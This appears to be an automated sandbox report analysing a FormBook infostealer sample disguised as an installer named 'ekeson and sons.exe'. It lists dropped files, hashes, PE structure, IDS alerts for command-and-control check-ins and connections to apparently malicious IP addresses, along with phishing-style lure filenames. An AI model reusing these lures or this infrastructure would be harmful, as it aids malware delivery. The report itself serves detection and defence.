                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          C:\Users\user\AppData\Local\Temp\nsdD06F.tmp\System.dll090000.exeGet hashmaliciousBrowse
                                                            PaymentCopy2021_pdf.exeGet hashmaliciousBrowse
                                                              doc64654475795.exeGet hashmaliciousBrowse
                                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                                  DOC_120229921_JUNE2021.exeGet hashmaliciousBrowse
                                                                    ORDER47.exeGet hashmaliciousBrowse
                                                                      jZuCbIpwNX.exeGet hashmaliciousBrowse
                                                                        DocumentCopy_pdf.exeGet hashmaliciousBrowse
                                                                          KK71rkO0Tf.exeGet hashmaliciousBrowse
                                                                            WP7IsjaUga.exeGet hashmaliciousBrowse
                                                                              RFQ.exeGet hashmaliciousBrowse
                                                                                Proforma Invoice & Bank Swift Copy.exeGet hashmaliciousBrowse
                                                                                  Mitchell_RFQ_36496.exeGet hashmaliciousBrowse
                                                                                    LEMO.exeGet hashmaliciousBrowse
                                                                                      DOC120229921JUNE2021.exeGet hashmaliciousBrowse
                                                                                        payment Advice.exeGet hashmaliciousBrowse
                                                                                          scan202106150100101.exeGet hashmaliciousBrowse
                                                                                            Swift_Report.exeGet hashmaliciousBrowse
                                                                                              RE Purchase Order.exeGet hashmaliciousBrowse
                                                                                                PAYMENT6.EXEGet hashmaliciousBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Temp\3wkdbws74191
                                                                                                  Process:C:\Users\user\Desktop\ekeson and sons.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):164351
                                                                                                  Entropy (8bit):7.989484606710162
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:PT9ia2LrXOyIncd1K/dVcxM7z0i9cedjJ9cbgKjG++:PTQLQncd1K1PznN+r+
                                                                                                  MD5:5F441D907EF2D5728293F483EDC989EC
                                                                                                  SHA1:12783A70C8F6A4B60D8F63EBCD8DFBFE02D40DED
                                                                                                  SHA-256:B41469815A60DF9C46AD790BD25042192BC699692BD6668566B319AE193CB050
                                                                                                  SHA-512:67A8D089108641269112A4FD39BB0BF480A24ED17CF478A5C0311F2F5CFF1A6C60ED236F6E7A64E79EBF37F7B829504C0D419EE869486C612564B9208802305F
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: A.....gkh@.....7.&|U;B..l.@.jE.'.8;L.I,........9.V'H.!....-.Ubk.".R....y...../.I{.....E.F.k..rz.T..J2Y.....!G.....|..8.......#e...t.>{...z...P.d/....M_.o.w.\.9....td....#XHN........._1..8zuw.w|h<s.z...Fq.........3....D...<,K.e......g'_N%..{.....6....R.gkhp.l.2*..~`U....b.J.'.8.L..,........9.V'H.!....-.Ebk.......x.Q..A....)<...5.d...X>..Nu....,@j.....M...&..odC.....#./....r..P.;),.n..O....N..!:....~..}.N..#.....7.t..=....PKX_.b_8e.W.w.h<s.z.j.\'.+..../.....3.../....<,K.M......Sg'_Q%..{9....6,.b.R.gkh-#l..*..~`U.B_.b.J..'.8;L.I,........9.V'H.!....-.Ebk.......x.Q..A....)<...5.d...X>..Nu....,@j.....M...&..odC.....#./....r..P.;),.n..O....N..!:....~..}.N..#.....7.HN........._.._8e..w|h<s.z.j.\'.+..../.....3.../....<,K.M......Sg'_Q%..{9....6,.b.R.gkh-#l..*..~`U.B_.b.J..'.8;L.I,........9.V'H.!....-.Ebk.......x.Q..A....)<...5.d...X>..Nu....,@j.....M...&..odC.....#./....r..P.;),.n..O....N..!:....~..}.N..#.....7.HN........._.._8e..w|h<s.z.j.\'.+..../.....3.../....<,
                                                                                                  C:\Users\user\AppData\Local\Temp\nsdD06F.tmp\System.dll
                                                                                                  Process:C:\Users\user\Desktop\ekeson and sons.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11776
                                                                                                  Entropy (8bit):5.855045165595541
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                  MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                  SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                  SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                  SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 090000.exe, Detection: malicious, Browse
                                                                                                  • Filename: PaymentCopy2021_pdf.exe, Detection: malicious, Browse
                                                                                                  • Filename: doc64654475795.exe, Detection: malicious, Browse
                                                                                                  • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                  • Filename: DOC_120229921_JUNE2021.exe, Detection: malicious, Browse
                                                                                                  • Filename: ORDER47.exe, Detection: malicious, Browse
                                                                                                  • Filename: jZuCbIpwNX.exe, Detection: malicious, Browse
                                                                                                  • Filename: DocumentCopy_pdf.exe, Detection: malicious, Browse
                                                                                                  • Filename: KK71rkO0Tf.exe, Detection: malicious, Browse
                                                                                                  • Filename: WP7IsjaUga.exe, Detection: malicious, Browse
                                                                                                  • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                                  • Filename: Proforma Invoice & Bank Swift Copy.exe, Detection: malicious, Browse
                                                                                                  • Filename: Mitchell_RFQ_36496.exe, Detection: malicious, Browse
                                                                                                  • Filename: LEMO.exe, Detection: malicious, Browse
                                                                                                  • Filename: DOC120229921JUNE2021.exe, Detection: malicious, Browse
                                                                                                  • Filename: payment Advice.exe, Detection: malicious, Browse
                                                                                                  • Filename: scan202106150100101.exe, Detection: malicious, Browse
                                                                                                  • Filename: Swift_Report.exe, Detection: malicious, Browse
                                                                                                  • Filename: RE Purchase Order.exe, Detection: malicious, Browse
                                                                                                  • Filename: PAYMENT6.EXE, Detection: malicious, Browse
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\nsiD03F.tmp
                                                                                                  Process:C:\Users\user\Desktop\ekeson and sons.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):248890
                                                                                                  Entropy (8bit):7.41460926637977
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:9a1TQLQncd1K1PznN+r7pzMInPVinlct:KQL1deN+BoInPVQ6
                                                                                                  MD5:3DD9BA3A9307840E0FC4868612F47C80
                                                                                                  SHA1:39ABED7FF99B827584EFEA7AC074C7430C480F1D
                                                                                                  SHA-256:D84EF1A2510842879D6BEE236F391F09A7D05CA90BC20D3A8E8CC671A7DBB715
                                                                                                  SHA-512:E0E2F56FC6FB9D6DBDC827433F361C96D3FCEA18D3E99A18B5B318FEA888EE5C3F39EB1B1612BA4DD9AD55C767B858523C341EB2FD768A9106F62448857AC2A6
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: .c......,.......................<L.......b.......c..............................................................q...........................................................................................................................................................................J...............l...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\ptvgptdddywyztk
                                                                                                  Process:C:\Users\user\Desktop\ekeson and sons.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):47249
                                                                                                  Entropy (8bit):4.934301032368985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:v2M1QMCrb/0lF/DVxjQTGYreDVjJF7mYowdNsKifbnn9XC/owdiF1PfFr0+afy6Q:OM1QMC+FzMSLDxbNtdN/wn9S/CHPfFrd
                                                                                                  MD5:3E3D50C813F3F0C558A2C428CAF7851C
                                                                                                  SHA1:5850AD1E8E3770655944DEF4B105265109EAC364
                                                                                                  SHA-256:FFE35971A2FDC638791CEAE80A5A5FEB43467CF7AE4FC163257D2D6DE77942E7
                                                                                                  SHA-512:14E75FD1FB4B6B35A23A25EA81B170E1F48FDC7AD876762528002D4005D3B844D565BEF2BAB27E04E788E304779DB648E2CDECB010E4EADA1BC45A63451C2356
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: U..|....S....................j.................-.................?...........B...../...........+.....?.......................c.....+.................c.....o.....}...........c.....+.................c.....o.....}...........?.............................}...........J.......................?...................................f.................r...........}...........2.........................................}.....Z...........-.....V.................f.................r...........}...........2.........................................}.................-.......................f.................r...........}...........2.........................................}.................-.......................f.................r...........}...........2.........................................}.................-...........?.....5.....r...........t.....p...........j

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                  Entropy (8bit):7.900880269653414
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:ekeson and sons.exe
                                                                                                  File size:206434
                                                                                                  MD5:3e961220355d19e5e1272fd963f4a3d7
                                                                                                  SHA1:f2aa5470d4d9d9bf35946ef8dfdb4c15ac9aa8bf
                                                                                                  SHA256:6935472304f1b2e4e19ca521bf82ef1064f62ced4bf0ee3d1b6eac32a3f4b61f
                                                                                                  SHA512:632006e2eacbeb4aa67b5290c2e8eeb0c4415cf20475b4e4850d1aeda5185fa3739576eb7fd22324674421a34df2d307bd00b06f22a0b4ba62f9434cc4f6402b
                                                                                                  SSDEEP:6144:Ds9iskF7UH2fJSL4hvAOqFVOPluUT9djCV6T/e9lCbaP3mN:yDWfJSKvAOoCuUxdmVuW9lH3M
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                  File Icon

                                                                                                  Icon Hash:b2a88c96b2ca6a72

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x40323c
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  sub esp, 00000180h
                                                                                                  push ebx
                                                                                                  push ebp
                                                                                                  push esi
                                                                                                  xor ebx, ebx
                                                                                                  push edi
                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                  mov dword ptr [esp+10h], 00409130h
                                                                                                  xor esi, esi
                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                  call dword ptr [00407030h]
                                                                                                  push 00008001h
                                                                                                  call dword ptr [004070B4h]
                                                                                                  push ebx
                                                                                                  call dword ptr [0040727Ch]
                                                                                                  push 00000008h
                                                                                                  mov dword ptr [00423F58h], eax
                                                                                                  call 00007FD294B2AF7Eh
                                                                                                  mov dword ptr [00423EA4h], eax
                                                                                                  push ebx
                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                  push 00000160h
                                                                                                  push eax
                                                                                                  push ebx
                                                                                                  push 0041F458h
                                                                                                  call dword ptr [00407158h]
                                                                                                  push 004091B8h
                                                                                                  push 004236A0h
                                                                                                  call 00007FD294B2AC31h
                                                                                                  call dword ptr [004070B0h]
                                                                                                  mov edi, 00429000h
                                                                                                  push eax
                                                                                                  push edi
                                                                                                  call 00007FD294B2AC1Fh
                                                                                                  push ebx
                                                                                                  call dword ptr [0040710Ch]
                                                                                                  cmp byte ptr [00429000h], 00000022h
                                                                                                  mov dword ptr [00423EA0h], eax
                                                                                                  mov eax, edi
                                                                                                  jne 00007FD294B2837Ch
                                                                                                  mov byte ptr [esp+14h], 00000022h
                                                                                                  mov eax, 00429001h
                                                                                                  push dword ptr [esp+14h]
                                                                                                  push eax
                                                                                                  call 00007FD294B2A712h
                                                                                                  push eax
                                                                                                  call dword ptr [0040721Ch]
                                                                                                  mov dword ptr [esp+1Ch], eax
                                                                                                  jmp 00007FD294B283D5h
                                                                                                  cmp cl, 00000020h
                                                                                                  jne 00007FD294B28378h
                                                                                                  inc eax
                                                                                                  cmp byte ptr [eax], 00000020h
                                                                                                  je 00007FD294B2836Ch
                                                                                                  cmp byte ptr [eax], 00000022h
                                                                                                  mov byte ptr [eax+eax+00h], 00000000h

                                                                                                  Rich Headers

                                                                                                  Programming Language:
                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                  .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                  RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                  RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                  RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                  RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                  RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                  SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                  Possible Origin

                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  06/15/21-14:02:16.588711TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.675.2.26.18
                                                                                                  06/15/21-14:02:16.588711TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.675.2.26.18
                                                                                                  06/15/21-14:02:16.588711TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.675.2.26.18
                                                                                                  06/15/21-14:02:16.768152TCP1201ATTACK-RESPONSES 403 Forbidden804974275.2.26.18192.168.2.6
                                                                                                  06/15/21-14:02:21.840916TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.675.2.26.18
                                                                                                  06/15/21-14:02:21.840916TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.675.2.26.18
                                                                                                  06/15/21-14:02:21.840916TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.675.2.26.18
                                                                                                  06/15/21-14:02:22.019643TCP1201ATTACK-RESPONSES 403 Forbidden804974375.2.26.18192.168.2.6
                                                                                                  06/15/21-14:02:43.707983TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.698.124.204.16
                                                                                                  06/15/21-14:02:43.707983TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.698.124.204.16
                                                                                                  06/15/21-14:02:43.707983TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.698.124.204.16
                                                                                                  06/15/21-14:02:54.552081TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.102.136.180
                                                                                                  06/15/21-14:02:54.552081TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.102.136.180
                                                                                                  06/15/21-14:02:54.552081TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.102.136.180
                                                                                                  06/15/21-14:02:54.665734TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.6

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jun 15, 2021 14:02:16.571783066 CEST4974280192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:16.588269949 CEST804974275.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:16.588426113 CEST4974280192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:16.588711023 CEST4974280192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:16.605035067 CEST804974275.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:16.768151999 CEST804974275.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:16.768191099 CEST804974275.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:16.768306017 CEST4974280192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:16.768465042 CEST4974280192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:16.784710884 CEST804974275.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:21.823795080 CEST4974380192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:21.840449095 CEST804974375.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:21.840673923 CEST4974380192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:21.840915918 CEST4974380192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:21.857472897 CEST804974375.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:22.019643068 CEST804974375.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:22.019663095 CEST804974375.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:22.019943953 CEST4974380192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:22.020037889 CEST4974380192.168.2.675.2.26.18
                                                                                                  Jun 15, 2021 14:02:22.036499977 CEST804974375.2.26.18192.168.2.6
                                                                                                  Jun 15, 2021 14:02:27.071455002 CEST4974780192.168.2.6198.54.117.218
                                                                                                  Jun 15, 2021 14:02:27.241863966 CEST8049747198.54.117.218192.168.2.6
                                                                                                  Jun 15, 2021 14:02:27.242052078 CEST4974780192.168.2.6198.54.117.218
                                                                                                  Jun 15, 2021 14:02:27.242146969 CEST4974780192.168.2.6198.54.117.218
                                                                                                  Jun 15, 2021 14:02:27.413139105 CEST8049747198.54.117.218192.168.2.6
                                                                                                  Jun 15, 2021 14:02:27.413184881 CEST8049747198.54.117.218192.168.2.6
                                                                                                  Jun 15, 2021 14:02:43.533252954 CEST4975080192.168.2.698.124.204.16
                                                                                                  Jun 15, 2021 14:02:43.707638025 CEST804975098.124.204.16192.168.2.6
                                                                                                  Jun 15, 2021 14:02:43.707870007 CEST4975080192.168.2.698.124.204.16
                                                                                                  Jun 15, 2021 14:02:43.707983017 CEST4975080192.168.2.698.124.204.16
                                                                                                  Jun 15, 2021 14:02:43.883925915 CEST804975098.124.204.16192.168.2.6
                                                                                                  Jun 15, 2021 14:02:43.883958101 CEST804975098.124.204.16192.168.2.6
                                                                                                  Jun 15, 2021 14:02:43.883972883 CEST804975098.124.204.16192.168.2.6
                                                                                                  Jun 15, 2021 14:02:43.884147882 CEST4975080192.168.2.698.124.204.16
                                                                                                  Jun 15, 2021 14:02:43.884221077 CEST4975080192.168.2.698.124.204.16
                                                                                                  Jun 15, 2021 14:02:44.057888985 CEST804975098.124.204.16192.168.2.6
                                                                                                  Jun 15, 2021 14:02:48.955566883 CEST4975180192.168.2.6166.62.28.135
                                                                                                  Jun 15, 2021 14:02:49.214277029 CEST8049751166.62.28.135192.168.2.6
                                                                                                  Jun 15, 2021 14:02:49.214458942 CEST4975180192.168.2.6166.62.28.135
                                                                                                  Jun 15, 2021 14:02:49.214734077 CEST4975180192.168.2.6166.62.28.135
                                                                                                  Jun 15, 2021 14:02:49.472481012 CEST8049751166.62.28.135192.168.2.6
                                                                                                  Jun 15, 2021 14:02:49.483886003 CEST8049751166.62.28.135192.168.2.6
                                                                                                  Jun 15, 2021 14:02:49.483906984 CEST8049751166.62.28.135192.168.2.6
                                                                                                  Jun 15, 2021 14:02:49.484051943 CEST4975180192.168.2.6166.62.28.135
                                                                                                  Jun 15, 2021 14:02:49.484114885 CEST4975180192.168.2.6166.62.28.135
                                                                                                  Jun 15, 2021 14:02:49.743681908 CEST8049751166.62.28.135192.168.2.6
                                                                                                  Jun 15, 2021 14:02:54.534857035 CEST4975280192.168.2.634.102.136.180
                                                                                                  Jun 15, 2021 14:02:54.551364899 CEST804975234.102.136.180192.168.2.6
                                                                                                  Jun 15, 2021 14:02:54.551933050 CEST4975280192.168.2.634.102.136.180
                                                                                                  Jun 15, 2021 14:02:54.552081108 CEST4975280192.168.2.634.102.136.180
                                                                                                  Jun 15, 2021 14:02:54.568543911 CEST804975234.102.136.180192.168.2.6
                                                                                                  Jun 15, 2021 14:02:54.665734053 CEST804975234.102.136.180192.168.2.6
                                                                                                  Jun 15, 2021 14:02:54.665766954 CEST804975234.102.136.180192.168.2.6
                                                                                                  Jun 15, 2021 14:02:54.665920019 CEST4975280192.168.2.634.102.136.180
                                                                                                  Jun 15, 2021 14:02:54.666044950 CEST4975280192.168.2.634.102.136.180
                                                                                                  Jun 15, 2021 14:02:54.683664083 CEST804975234.102.136.180192.168.2.6
                                                                                                  Jun 15, 2021 14:03:00.043487072 CEST4975380192.168.2.645.130.231.56
                                                                                                  Jun 15, 2021 14:03:00.255410910 CEST804975345.130.231.56192.168.2.6
                                                                                                  Jun 15, 2021 14:03:00.255522966 CEST4975380192.168.2.645.130.231.56
                                                                                                  Jun 15, 2021 14:03:00.255693913 CEST4975380192.168.2.645.130.231.56
                                                                                                  Jun 15, 2021 14:03:00.464648962 CEST804975345.130.231.56192.168.2.6
                                                                                                  Jun 15, 2021 14:03:00.464818001 CEST804975345.130.231.56192.168.2.6
                                                                                                  Jun 15, 2021 14:03:00.465085030 CEST4975380192.168.2.645.130.231.56
                                                                                                  Jun 15, 2021 14:03:00.465178013 CEST804975345.130.231.56192.168.2.6
                                                                                                  Jun 15, 2021 14:03:00.465257883 CEST4975380192.168.2.645.130.231.56
                                                                                                  Jun 15, 2021 14:03:00.674134970 CEST804975345.130.231.56192.168.2.6

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jun 15, 2021 14:00:47.908982038 CEST4944853192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:47.941533089 CEST53494488.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:48.702656031 CEST6034253192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:48.735466003 CEST53603428.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:49.388422012 CEST6134653192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:49.421518087 CEST53613468.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:50.578263044 CEST5177453192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:50.602322102 CEST53517748.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:51.280648947 CEST5602353192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:51.304970980 CEST53560238.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:51.988099098 CEST5838453192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:52.012155056 CEST53583848.8.8.8192.168.2.6
